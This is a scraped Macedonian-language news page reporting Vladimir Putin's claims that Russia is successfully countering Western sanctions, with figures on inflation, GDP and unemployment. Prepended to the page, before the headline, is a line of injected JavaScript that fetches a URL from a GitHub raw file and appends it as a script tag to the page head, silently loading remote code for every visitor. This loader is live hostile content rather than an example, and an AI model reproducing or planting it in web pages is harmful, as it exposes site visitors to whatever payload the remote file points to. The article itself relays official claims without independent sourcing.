;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Путин: Русија успешно се справува со финансиската и технолошката агресија на Западот - Антропол
АктуелноИнтернационално

Путин: Русија успешно се справува со финансиската и технолошката агресија на Западот

Русија успешно се справува со финансиската и технолошката агресија на земјите од Западот, нивната тактика на економски „блицкрик“ е неуспешна, рече Владимир Путин на состанокот за економски прашања.

Непосредно по засилувањето на текот на санкциите руските власти веднаш воведоа заштитни мерки и отпочнаа механизми за поддршка на клучните индустрии, основните претпријатија, малите и средни бизниси. Претседателот истакна дека главни цели биле да се зачуваат работните места и да се пружи помош на граѓаните, особено на семејствата со деца и пензионерите.

„Спречивме поголем пад на економијата и успеавме брзо да ја стабилизираме инфлацијата. Годишната инфлацијата ќе биде околу 12 проценти“, нагласи шефот на државата.

Според рускиот претседател економијата постепено се стабилизира и се движи кон раст, додека пак претпријатијата се враќаат во нормален ритам на работа.

Путин забележа и намалување на стапката на пад на БДП, во јули тој е помалку за половина процент по јунскиот пад од 2,4%. Дополнително, во август заживеа и банкарското кредитирање на стопанството, реалниот сектор и населението. Тој нагласи дека ова е добар знак што укажува на раст на економската активност.

За возврат, невработеноста во Русија е на историски најниско ниво: во мај-јули, бројката беше на ниво од 3,9 проценти. Претседателот нареди прашањето со невработеноста да се држи под контрола, затоа што е зголемен бројот на лица кои се на принуден одмор.

„Треба да овозможиме услови за реструктуирање на економијата и за понатамошно структурно реструктуирање, вклучително и спроведување на големи технолошки проекти, кои гарантираат раст на економската активност и развој на инфраструктурата во руските региони, што создава нови работни места“, додаде шефот на државата.

Безусловен приоритет во буџетирањето треба да биде развојот и реализацијата на проектите од национално значење кои се во интерес на граѓаните, нагласи претседателот.